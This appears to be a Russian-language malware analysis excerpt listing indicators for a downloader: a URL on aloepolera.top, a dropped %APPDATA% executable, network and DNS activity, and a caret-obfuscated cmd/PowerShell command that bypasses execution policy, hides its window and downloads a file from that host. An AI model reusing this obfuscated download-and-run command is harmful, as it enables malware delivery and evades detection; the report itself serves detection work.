Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWE^RSH^elL^.EXE^ -^E^Xe^Cu^TionP^OLICY ^b^yp^AS^s ^-noP^R^O^f^I^l^E -WIN^d^ow^st^Y^lE ^hidd^En^ ^(Ne^W-O^bj^Ect ^SyS^Te^M.N^ET^.^WeBCLiEn^t^).^Dow^nLoaDfIl^E('http://aloepolera....
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "P^OWE^RSH^elL^.EXE^ -^E^Xe^Cu^TionP^OLICY ^b^yp^AS^s ^-noP^R^O^f^I^l^E -WIN^d^ow^st^Y^lE ^hidd^En^ ^(Ne^W-O^bj^Ect ^SyS^Te^M.N^ET^.^WeBCLiEn^t^).^Dow^nLoaDfIl^E('http://aloepolera....' (со скрытым окном)